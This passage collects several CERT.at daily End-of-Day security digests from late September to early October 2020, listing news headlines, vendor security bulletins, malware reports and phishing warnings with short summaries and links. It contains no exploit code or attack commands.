Have you already heard of the "KoreTrak" smartwatch that is supposed to be a lifesaver for senior citizens? Or of the LiveWave Antenna that conjures free television into your living room? If so, you have probably come across a dubious advertisement from verbraucherclub.de.
---------------------------------------------
https://www.watchlist-internet.at/news/verbraucherclubde-warnung-vor-unseri…
∗∗∗ Microsoft Exchange CVE-2020-0688 Revisited -- in two acts ∗∗∗
---------------------------------------------
In April we published a blog post about Microsoft Exchange servers that were vulnerable to CVE-2020-0688, a flaw that had already been patched in February 2020.
---------------------------------------------
https://cert.at/de/aktuelles/2020/10/microsoft-exchange-cve-2020-0688-revis…
=====================
= Vulnerabilities =
=====================
∗∗∗ Apple's T2: When the security chip becomes a keylogger ∗∗∗
---------------------------------------------
Apple's T2 chip is actually meant to provide security; a research team, however, was able to turn it into a keylogger.
---------------------------------------------
https://www.golem.de/news/apples-t2-wenn-der-sicherheitschip-zum-keylogger-…
∗∗∗ We Hacked Apple for 3 Months: Here’s What We Found ∗∗∗
---------------------------------------------
During our engagement, we found a variety of vulnerabilities in core portions of their infrastructure that would've allowed an attacker to fully compromise both customer and employee applications, launch a worm capable of automatically taking over a victim's iCloud account, retrieve source code for internal Apple projects, [...]
---------------------------------------------
https://samcurry.net/hacking-apple/
∗∗∗ Credit card skimmer targets virtual conference platform ∗∗∗
---------------------------------------------
Criminals have gone after an online conference platform to steal credit card data from virtual attendees.
---------------------------------------------
https://blog.malwarebytes.com/malwarebytes-news/2020/10/credit-card-skimmer…
∗∗∗ Security Bulletin: An XPath vulnerability may impact IBM Cúram Social Program Management (CVE-2020-4774) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-an-xpath-vulnerability-ma…
∗∗∗ Security Bulletin: IBM Cúram Social Program Management uses MD5 algorithm (CVE-2020-4778) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cram-social-program-m…
∗∗∗ Security Bulletin: A cross-site scripting (XSS) vulnerability may impact IBM Cúram Social Program Management (CVE-2020-4775) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-cross-site-scripting-xs…
∗∗∗ Security Bulletin: IBM Kenexa LCMS Premier On Premise – IBM SDK, Java Technology Edition Quarterly CPU – Jul 2020 – Includes Oracle Jul 2020 CPU plus one additional vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-kenexa-lcms-premier-o…
∗∗∗ Security Bulletin: An improper input validation vulnerability may impact IBM Cúram Social Program Management (CVE-2020-4781) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-an-improper-input-validat…
∗∗∗ Security Bulletin: API Connect is vulnerable to denial of service via Kubernetes (CVE-2020-8557, CVE-2020-8559) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-vulnerable…
∗∗∗ Security Bulletin: Security vulnerabilities have been fixed in IBM Security Access Manager and IBM Security Verify Access (CVE-2020-4661, CVE-2020-4699, CVE-2020-4660) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
∗∗∗ Security Bulletin: API Connect is vulnerable to denial of service (CVE-2020-16845) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-api-connect-is-vulnerable…
∗∗∗ Security Bulletin: Vulnerabilities in Node.js affect IBM Integration Bus & IBM App Connect Enterprise V11 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-node-j…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java Runtime affect IBM Integration Bus and IBM App Connect Enterprise v11. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 07-10-2020 18:00 − Thursday 08-10-2020 18:00
Handler: Dimitri Robl
Co-Handler: Robert Waldner
=====================
= News =
=====================
∗∗∗ SiteCheck Malware Report: September Summary ∗∗∗
---------------------------------------------
In September alone, a total of 17,138,086 website scans were performed using SiteCheck. Of those scans, 178,299 infected sites were detected.
---------------------------------------------
https://blog.sucuri.net/2020/10/sitecheck-malware-report-september-summary.…
∗∗∗ Researchers Find Vulnerabilities in Microsoft Azure Cloud Service ∗∗∗
---------------------------------------------
Now according to the latest research, two security flaws in Microsoft's Azure App Services could have enabled a bad actor to carry out server-side request forgery (SSRF) attacks or execute arbitrary code and take over the administration server.
...
Discovered by Paul Litvak of Intezer Labs, the flaws were reported to Microsoft in June, after which the company subsequently addressed them.
---------------------------------------------
https://thehackernews.com/2020/10/microsoft-azure-vulnerability.html
=====================
= Vulnerabilities =
=====================
∗∗∗ QNAP NAS: New version of the Helpdesk app fixes two critical vulnerabilities ∗∗∗
---------------------------------------------
The Helpdesk app for QNAP network-attached storage devices had two security vulnerabilities through which attackers could have gained control of the devices.
---------------------------------------------
https://heise.de/-4923916
∗∗∗ Multiple Cross-Site Scripting Vulnerabilities in Confluence Marketplace Plugins ∗∗∗
---------------------------------------------
Multiple Confluence plugins from different vendors are affected by stored cross-site scripting vulnerabilities that allow attackers to inject malicious JavaScript code into Confluence pages.
Affected plugins: PlantUML, Refined Toolkit for Confluence, Linking for Confluence, Countdown Timer, Server Status
Business recommendation: Update to the latest versions of the plugins.
---------------------------------------------
https://sec-consult.com/./en/blog/advisories/multiple-cross-site-scripting-…
∗∗∗ Vulnerability Exposes Over 4 Million Sites Using WPBakery ∗∗∗
---------------------------------------------
On July 27th, our Threat Intelligence team discovered a vulnerability in WPBakery, a WordPress plugin installed on over 4.3 million sites. This flaw made it possible for authenticated attackers with contributor-level or above permissions to inject malicious JavaScript in posts. [...] a final sufficient patch was released on September 24, 2020. We highly recommend updating to the latest version, 6.4.1 as of today, immediately.
---------------------------------------------
https://www.wordfence.com/blog/2020/10/vulnerability-exposes-over-4-million…
∗∗∗ IBM Security Bulletins ∗∗∗
---------------------------------------------
IBM has published a number of security bulletins:
* https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
* https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
* https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
---------------------------------------------
https://www.ibm.com/blogs/psirt/
∗∗∗ Security updates: Attackers could disable Cisco video surveillance ∗∗∗
---------------------------------------------
Network equipment vendor Cisco has released important patches for, among other things, surveillance cameras and the Webex online meeting software.
List sorted by severity in descending order:
* Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Remote Code Execution and Denial of Service
* Webex Teams Client for Windows DLL Hijacking
* Identity Services Engine Authorization Bypass
* Industrial Network Director Denial of Service
* Video Surveillance 8000 Series IP Cameras Cisco Discovery Protocol Memory Leak
* Vision Dynamic Signage Director Missing Authentication
* SD-WAN vManage Cross-Site Scripting
* StarOS Privilege Escalation
* Expressway Series and TelePresence Video Communication Server Denial of Service
* Email Security Appliance URL Filtering Bypass
* Nexus Data Broker Software Path Traversal
* Firepower Management Center Cross-Site Scripting
* Identity Services Engine Cross-Site Scripting
* StarOS Privilege Escalation
---------------------------------------------
https://heise.de/-4924026
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 06-10-2020 18:00 − Wednesday 07-10-2020 18:00
Handler: Dimitri Robl
Co-Handler: Thomas Pribitzer
=====================
= News =
=====================
∗∗∗ Backdoor Shell Dropper Deploys CMS-Specific Malware ∗∗∗
---------------------------------------------
The vast majority of the malware we find on compromised websites consists of backdoors that allow an attacker to maintain unauthorized access to the site and execute whatever commands they want.
---------------------------------------------
https://blog.sucuri.net/2020/10/backdoor-shell-dropper-deploys-cms-specific…
∗∗∗ Alert (AA20-280A): Emotet Malware ∗∗∗
---------------------------------------------
Emotet—a sophisticated Trojan commonly functioning as a downloader or dropper of other malware—resurged in July 2020, after a dormant period that began in February.
---------------------------------------------
https://us-cert.cisa.gov/ncas/alerts/aa20-280a
∗∗∗ New HEH botnet can wipe routers and IoT devices ∗∗∗
---------------------------------------------
The disk-wiping feature is present in the code but has not been used yet.
---------------------------------------------
https://www.zdnet.com/article/new-heh-botnet-can-wipe-routers-and-iot-devic…
∗∗∗ Fraudulent e-mail in the name of the Post spreads malware ∗∗∗
---------------------------------------------
Fraudulent e-mails in the name of the Post are currently being sent indiscriminately to numerous recipients. The criminals threaten the victims with a fine because certain costs have supposedly not yet been paid.
---------------------------------------------
https://www.watchlist-internet.at/news/betruegerische-post-mail-verbreitet-…
=====================
= Vulnerabilities =
=====================
∗∗∗ Enter the Vault: Authentication Issues in HashiCorp Vault ∗∗∗
---------------------------------------------
Posted by Felix Wilhelm, Project Zero: In this blog post I'll discuss two vulnerabilities in HashiCorp Vault and its integration with Amazon Web Services (AWS) and Google Cloud Platform (GCP).
---------------------------------------------
https://googleprojectzero.blogspot.com/2020/10/enter-the-vault-auth-issues-…
∗∗∗ 90 days, 16 bugs, and an Azure Sphere Challenge ∗∗∗
---------------------------------------------
Cisco Talos reports 16 vulnerabilities found during Microsoft's sponsored Azure Sphere research challenge.
---------------------------------------------
https://blog.talosintelligence.com/2020/10/Azure-Sphere-Challenge.html
∗∗∗ Security Bulletin: Security vulnerabilities in OpenSSH and OpenSSL shipped with IBM Security Access Manager Appliance (CVE-2018-15473, CVE-2019-1559) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
∗∗∗ Security Bulletin: Security Vulnerabilities affect IBM Cloud Pak for Data – Node.js (CVE-2019-15606, CVE-2019-15604, CVE-2019-15605) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by kernel vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by an Apache commons beanutils 1.9.2 library vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM API Connect's Developer Portal is impacted by vulnerabilities in MySQL. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-api-connects-develope…
∗∗∗ Security Bulletin: Liberty for Java for IBM Cloud is vulnerable to a denial of service (CVE-2020-4590) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-liberty-for-java-for-ibm-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by an OpenSSL vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by Oracle MySQL vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by an Apache Commons vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by Oracle MySQL vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
=====================
= End-of-Day report =
=====================
Timeframe: Monday 05-10-2020 18:00 − Tuesday 06-10-2020 18:00
Handler: Dimitri Robl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Hacker group compromises mobile provider to steal credit cards ∗∗∗
---------------------------------------------
Credit card skimming group Fullz House has compromised and injected the website of US mobile virtual network operator (MVNO) Boom! Mobile with a credit card stealer script.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hacker-group-compromises-mob…
∗∗∗ Ransomware threat surge, Ryuk attacks about 20 orgs per week ∗∗∗
---------------------------------------------
Malware researchers monitoring ransomware threats noticed a sharp increase in these attacks over the past months compared to the first six months of 2020.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/ransomware-threat-surge-ryuk…
∗∗∗ Obfuscation and Repetition, (Mon, Oct 5th) ∗∗∗
---------------------------------------------
The obfuscated payload of a maldoc submitted by a reader can be quickly extracted with the "strings method" I explained in diary entry "Quickie: String Analysis is Still Useful".
---------------------------------------------
https://isc.sans.edu/diary/rss/26648
∗∗∗ Release the Kraken: Fileless APT attack abuses Windows Error Reporting service ∗∗∗
---------------------------------------------
We discovered a new attack that injected its payload, dubbed "Kraken", into the Windows Error Reporting (WER) service as a defense evasion mechanism.
---------------------------------------------
https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuse…
∗∗∗ Recognising fraud on Amazon: Here's how ∗∗∗
---------------------------------------------
You can also come across fraudulent offers on Amazon. The good news first: a fraudulent offer can be exposed quickly by taking a closer look at the profile of the Marketplace seller. If you are asked there to contact the seller by e-mail before placing an order, it is fraud!
---------------------------------------------
https://www.watchlist-internet.at/news/betrug-auf-amazon-erkennen-so-gehts/
∗∗∗ 5 steps to secure your connected devices ∗∗∗
---------------------------------------------
As we steadily adopt smart devices into our lives, we shouldn’t forget about keeping them secured and our data protected.
---------------------------------------------
https://www.welivesecurity.com/2020/10/05/5-steps-secure-connected-devices/
=====================
= Vulnerabilities =
=====================
∗∗∗ Smart male chastity lock cock-up ∗∗∗
---------------------------------------------
TL;DR Smart Bluetooth male chastity lock, designed for user to give remote control to a trusted 3rd party using mobile app [...]
---------------------------------------------
https://www.pentestpartners.com/security-blog/smart-male-chastity-lock-cock…
∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to Multiple Jackson-Databind CVEs – February 2020 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme…
∗∗∗ Security Bulletin: IBM DataPower Gateway is potentially vulnerable to a Denial of Service (CVE-2020-14147) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-datapower-gateway-is-…
∗∗∗ Security Bulletin: IBM DataPower Gateway can expose remote credentials to local users (CVE-2020-4528) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-datapower-gateway-can…
∗∗∗ Security Bulletin: Multiple Security Vulnerabilities fixed in IBM WebSphere Liberty as shipped in IBM Security Access Manager ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnera…
∗∗∗ Security Bulletin: Cross-Site Scripting (XSS) fixed in IBM Security Access Manager 9.0.7.2 (CVE-2019-4725) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cross-site-scripting-xss-…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by an Oracle MySQL vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: IBM DataPower Gateway may allow a potential DoS when importing malicious ZIP files (CVE-2019-13232) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-datapower-gateway-may…
∗∗∗ Security Bulletin: IBM Security Guardium is affected by Python vulnerabilities ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-security-guardium-is-…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Rational Performance Tester ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK and IBM Java Runtime affect Rational Service Tester ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ October 2020 ∗∗∗
---------------------------------------------
https://source.android.com/security/bulletin/2020-10-01
=====================
= End-of-Day report =
=====================
Timeframe: Friday 02-10-2020 18:00 − Monday 05-10-2020 18:00
Handler: Dimitri Robl
Co-Handler: Thomas Pribitzer
=====================
= News =
=====================
∗∗∗ MosaicRegressor: Lurking in the Shadows of UEFI ∗∗∗
---------------------------------------------
We found a compromised UEFI firmware image that contained a malicious implant. To the best of our knowledge, this is the second known public case where malicious UEFI firmware in use by a threat actor was found in the wild.
---------------------------------------------
https://securelist.com/mosaicregressor/98849/
∗∗∗ Egregor Ransomware Threatens ‘Mass-Media’ Release of Corporate Data ∗∗∗
---------------------------------------------
The newly discovered ransomware is hitting companies worldwide, including the GEFCO global logistics company.
---------------------------------------------
https://threatpost.com/egregor-ransomware-mass-media-corporate-data/159816/
∗∗∗ Scanning for SOHO Routers, (Sat, Oct 3rd) ∗∗∗
---------------------------------------------
In the past 30 days there has been a lot of scanning activity looking for small office and home office (SOHO) routers, targeting Netgear devices.
---------------------------------------------
https://isc.sans.edu/diary/rss/26638
∗∗∗ Raccine tool aims to protect Windows shadow copies from ransomware ∗∗∗
---------------------------------------------
Ransomware encrypts files and deletes data that victims could use for recovery. The free tool Raccine aims to help.
---------------------------------------------
https://heise.de/-4920206
∗∗∗ Attacks Aimed at Disrupting the Trickbot Botnet ∗∗∗
---------------------------------------------
Over the past 10 days, someone has been launching a series of coordinated attacks designed to disrupt Trickbot, an enormous collection of more than two million malware-infected Windows PCs that are constantly being harvested for financial data and are often used as the entry point for deploying ransomware within compromised organizations.
---------------------------------------------
https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbo…
∗∗∗ Black-T: New Cryptojacking Variant from TeamTnT ∗∗∗
---------------------------------------------
Code within the Black-T malware sample gives evidence of a shift in tactics, techniques and procedures for TeamTnT operations.
---------------------------------------------
https://unit42.paloaltonetworks.com/black-t-cryptojacking-variant/
∗∗∗ Shodan Verified Vulns 2020-10-05 ∗∗∗
---------------------------------------------
As announced in our blog post from September, we want to provide a monthly overview of Shodan's "Verified Vulnerabilities" in Austria.
---------------------------------------------
https://cert.at/de/aktuelles/2020/10/shodan-verified-vulns-2020-10-05
=====================
= Vulnerabilities =
=====================
∗∗∗ Tenda Router Zero-Days Emerge in Spyware Botnet Campaign ∗∗∗
---------------------------------------------
A variant of the Mirai botnet, called Ttint, has added espionage capabilities to complement its denial-of-service functions.
---------------------------------------------
https://threatpost.com/tenda-router-zero-days-spyware-botnet/159834/
∗∗∗ Patch urgently: Around a quarter of a million Exchange servers vulnerable ∗∗∗
---------------------------------------------
Criminals are exploiting a vulnerability in Microsoft Exchange to take over servers, even though a patch has been available since February.
---------------------------------------------
https://heise.de/-4920095
∗∗∗ Security Bulletin: IBM Cloud Pak for Integration Operators affected by multiple vulnerabilities ∗∗∗
---------------------------------------------
Operators for IBM Cloud Pak for Integration (CP4I) version 2020.2 are affected by vulnerabilities in Go prior to Go version 1.14.7.
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-cloud-pak-for-integra…
∗∗∗ Multiple critical vulnerabilities in RocketLinx Series ∗∗∗
---------------------------------------------
https://sec-consult.com/en/blog/advisories/multiple-critical-vulnerabilitie…
∗∗∗ WAGO: XSS vulnerability in Web-UI in WAGO 750-88X and WAGO 750-89X ∗∗∗
---------------------------------------------
https://cert.vde.com/de-de/advisories/vde-2020-029
∗∗∗ WAGO: Vulnerability in web-based authentication in WAGO 750-8XX Version <= FW07 ∗∗∗
---------------------------------------------
https://cert.vde.com/de-de/advisories/vde-2020-027
∗∗∗ WAGO: Authentication Bypass Vulnerability in WAGO 750-36X and WAGO 750-8XX Versions <= FW03 ∗∗∗
---------------------------------------------
https://cert.vde.com/de-de/advisories/vde-2020-028
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 01-10-2020 18:00 − Friday 02-10-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Developing secure software with OWASP SAMM ∗∗∗
---------------------------------------------
Security matters throughout the entire development process, and OWASP SAMM provides a flexible framework for putting it into practice.
---------------------------------------------
https://heise.de/-4918292
∗∗∗ Common Ways Attackers Are Stealing Credentials ∗∗∗
---------------------------------------------
A few weeks ago, we reviewed some of the worst website hacks we’ve ever seen. Every one of them started with poor password choices and escalated into a disastrous event for the site owner. Strong passwords and good password hygiene are often the first line of defense.
---------------------------------------------
https://www.wordfence.com/blog/2020/10/common-ways-attackers-are-stealing-c…
∗∗∗ Mass fake Post e-mails: How to expose the fraud! ∗∗∗
---------------------------------------------
Fraudsters are currently sending numerous e-mails in the name of the Post. In them, the criminals pretend that shipping costs are missing and that a parcel therefore cannot be delivered. In fact, this is a so-called "phishing attempt": the criminals are trying to obtain your login credentials this way. We explain how to expose the fraud!
---------------------------------------------
https://www.watchlist-internet.at/news/massenhaft-gefaelschte-post-mails-so…
∗∗∗ New service checks if your email was used in Emotet attacks ∗∗∗
---------------------------------------------
A new service has been launched that allows you to check if an email domain or address was in an Emotet spam campaign.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/new-service-checks-if-your-e…
∗∗∗ QR Codes: A Sneaky Security Threat ∗∗∗
---------------------------------------------
What to watch out for, and how to protect yourself from malicious versions of these mobile shortcuts.
---------------------------------------------
https://threatpost.com/qr-codes-sneaky-security-threat/159757/
∗∗∗ Serious Security: Phishing without links - when phishers bring along their own web pages ∗∗∗
---------------------------------------------
How do you "check the URL before you click" if the web page you're visiting is already on your own computer?
---------------------------------------------
https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-witho…
∗∗∗ GFX Xsender Hack Tool: A Spam Mailer ∗∗∗
---------------------------------------------
PHP hack tools are created and used by attackers to help automate frequent or tedious tasks. During a recent investigation, we came across a hack tool used to simplify the process of sending predefined HTML emails to a list of email addresses. The tool runs on top of PHPMailer’s library, which handles the connection and sending of the malicious emails. The hack tool also grants the ability to authenticate to an email address on a remote server.
---------------------------------------------
https://blog.sucuri.net/2020/10/gfx-xsender-hack-tool-a-spam-mailer.html
∗∗∗ [SANS ISC] Analysis of a Phishing Kit ∗∗∗
---------------------------------------------
I published the following diary on isc.sans.edu: “Analysis of a Phishing Kit”: Sometimes, attackers make mistakes and allow security researchers to access interesting resources. This time, it’s another phishing kit that was left in the wild on the compromised server.
---------------------------------------------
https://blog.rootshell.be/2020/10/02/sans-isc-analysis-of-a-phishing-kit/
=====================
= Vulnerabilities =
=====================
∗∗∗ macOS 10.14.6 Supplemental Update ∗∗∗
---------------------------------------------
macOS 10.14.6 Supplemental Update for macOS Mojave includes the security content of Safari 14.0.
---------------------------------------------
https://support.apple.com/kb/HT211872
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (jruby and ruby2.3), Fedora (crun, pdns, and podman), openSUSE (go1.14 and kernel), Oracle (qemu-kvm and virt:ol), Red Hat (qemu-kvm-ma and thunderbird), SUSE (nodejs10, nodejs12, perl-DBI, permissions, and xen), and Ubuntu (ntp).
---------------------------------------------
https://lwn.net/Articles/833343/
∗∗∗ Security Bulletin: Vulnerabilities in Ruby on Rails affect IBM License Metric Tool v9. ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerabilities-in-ruby-o…
∗∗∗ Security Bulletin: A vulnerability in Ruby on Rails affects IBM License Metric Tool v9 (CVE-2020-8166). ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ruby-o…
∗∗∗ Security Bulletin: A vulnerability in Ruby on Rails affects IBM License Metric Tool v9 (CVE-2020-8164). ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ruby-o…
∗∗∗ Security Bulletin: Security Vulnerabilities affect IBM Cloud Pak for Data – Node.js (CVE-2020-8203) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-security-vulnerabilities-…
∗∗∗ Security Bulletin: App Connect Enterprise Certified Container is vulnerable to CVE-2019-11324 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-app-connect-enterprise-ce…
∗∗∗ Security Bulletin: Multiple IBM DB2 Server Security Vulnerabilities Affect IBM Emptoris Strategic Supply Management Platform ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-ibm-db2-server-s…
∗∗∗ Security Bulletin: IBM Maximo Asset Management is vulnerable to Authentication Bypass (CVE-2020-4493) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-maximo-asset-manageme…
∗∗∗ Security Bulletin: Vulnerability in Apache Commons Codec affects IBM Cúram Social Program Management (177835) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-apache-c…
∗∗∗ Security Bulletin: Multiple IBM DB2 Server Security Vulnerabilities Affect IBM Emptoris Contract Management ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-ibm-db2-server-s…
∗∗∗ Security Bulletin: Vulnerability in WebSphere Application Server Liberty affects IBM Operations Analytics – Log Analysis (CVE-2020-4590) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-in-webspher…
∗∗∗ Multiple Vulnerabilities in SevOne Network Management System (NMS) ∗∗∗
---------------------------------------------
https://sec-consult.com/./en/blog/advisories/multiple-vulnerabilities-in-se…
∗∗∗ PHP: Multiple vulnerabilities ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0949
∗∗∗ Trend Micro AntiVirus for Mac: Vulnerability allows privilege escalation ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0948
∗∗∗ Bitdefender products: Vulnerability allows denial of service ∗∗∗
---------------------------------------------
http://www.cert-bund.de/advisoryshort/CB-K20-0947
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 30-09-2020 18:00 − Thursday 01-10-2020 18:00
Handler: Stephan Richter
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ On the responsibility that comes with good JavaScript support ∗∗∗
---------------------------------------------
Why websites and apps do not necessarily have to "work without JavaScript", but why they, and we, could use JavaScript more responsibly.
---------------------------------------------
https://heise.de/-4907606
∗∗∗ Don't share WhatsApp messages for emojis and smileys! ∗∗∗
---------------------------------------------
Criminals are increasingly sending WhatsApp messages that advertise free offers and ask recipients to forward them. A scam message is currently circulating that promises new emojis for WhatsApp if it is shared 20 times. The message is fake and leads to further dubious offers.
---------------------------------------------
https://www.watchlist-internet.at/news/keine-whatsapp-nachrichten-fuer-emoj…
∗∗∗ Phishing with captchas ∗∗∗
---------------------------------------------
A flood of phishing e-mails targeting Microsoft Office 365 uses captchas to lull victims into a false sense of security.
---------------------------------------------
https://www.zdnet.de/88383103/phishing-mit-captchas/
∗∗∗ IOCs turning into IOOIs, (Thu, Oct 1st) ∗∗∗
---------------------------------------------
Remember, back in the days, when the anti-virus vendors looked with derision at some of their competition, exclaiming "But they are using just SIGNATURES. Our tool detects BEHAVIOURS". That was like 15 years ago. Fast forward to today, with many of the same vendors now selling "threat intelligence feeds" for good money, and the most frequent attributes pushed over these feeds are MD5/SHA1 hashes and IP addresses. The main thing that changed is that we now call these items [...]
---------------------------------------------
https://isc.sans.edu/diary/rss/26624
∗∗∗ Network Detection for ZeroLogon (CVE-2020-1472) ∗∗∗
---------------------------------------------
ZeroLogon has quickly become popular and well known because of multiple proofs of concept and exploits implemented in Python, .NET and PowerShell, and Mimikatz has added a module for it. So if you are an attacker or need to test your environment, you have plenty of options. As defenders, we also have options for detection on the network.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/network-det…
∗∗∗ Evasive URLs in Spam: Part 2 ∗∗∗
---------------------------------------------
A URL can be completely valid, yet still misleading. In this blog, we will present another technique with URLs that we observed in a recent malicious spam campaign. This is the continuation of an earlier blog that discussed how valid URL formats can be used in evading detection.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/evasive-url…
∗∗∗ Detecting Microsoft 365 and Azure Active Directory Backdoors ∗∗∗
---------------------------------------------
Mandiant has seen an uptick in incidents involving Microsoft 365 (M365) and Azure Active Directory (Azure AD). Most of these incidents are the result of a phishing email coercing a user to enter their credentials used for accessing M365 into a phishing site. Other incidents have been a result of password spraying, password stuffing, or simple brute force attempts against M365 tenants. In almost all of these incidents, the user or account was not protected by multi-factor authentication (MFA).
---------------------------------------------
http://www.fireeye.com/blog/threat-research/2020/09/detecting-microsoft-365…
∗∗∗ Three immediate steps to take to protect your APIs from security risks ∗∗∗
---------------------------------------------
In one form or another, APIs have been around for years, bringing the benefits of ease of use, efficiency and flexibility to the developer community. The advantage of using APIs for mobile and web apps is that developers can build and deploy functionality and data integrations quickly. But there is a huge downside to this approach.
---------------------------------------------
https://www.helpnetsecurity.com/2020/10/01/api-security-posture/
∗∗∗ A complete stranger controlled this woman’s home security system, but they’re not the one she’s angry with ∗∗∗
---------------------------------------------
Imagine being contacted by a complete stranger via Facebook, and them telling you that they have complete control over the security system in your new home.
---------------------------------------------
https://www.bitdefender.com/box/blog/iot-news/complete-stranger-controlled-…
∗∗∗ IPStorm botnet expands from Windows to Android, Mac, and Linux ∗∗∗
---------------------------------------------
IPStorm botnet quadruples in size to reach 13,500 infected systems.
---------------------------------------------
https://www.zdnet.com/article/ipstorm-botnet-expands-from-windows-to-androi…
=====================
= Vulnerabilities =
=====================
∗∗∗ Critical Flaws Discovered in Popular Industrial Remote Access Systems ∗∗∗
---------------------------------------------
Cybersecurity researchers have found critical security flaws in two popular industrial remote access systems that can be exploited to block access to industrial production floors, hack into company networks, tamper with data, and even steal sensitive business secrets. The flaws, discovered by Tel Aviv-based OTORIO, were identified in B&R Automation's SiteManager and GateManager, and MB Connect [...]
---------------------------------------------
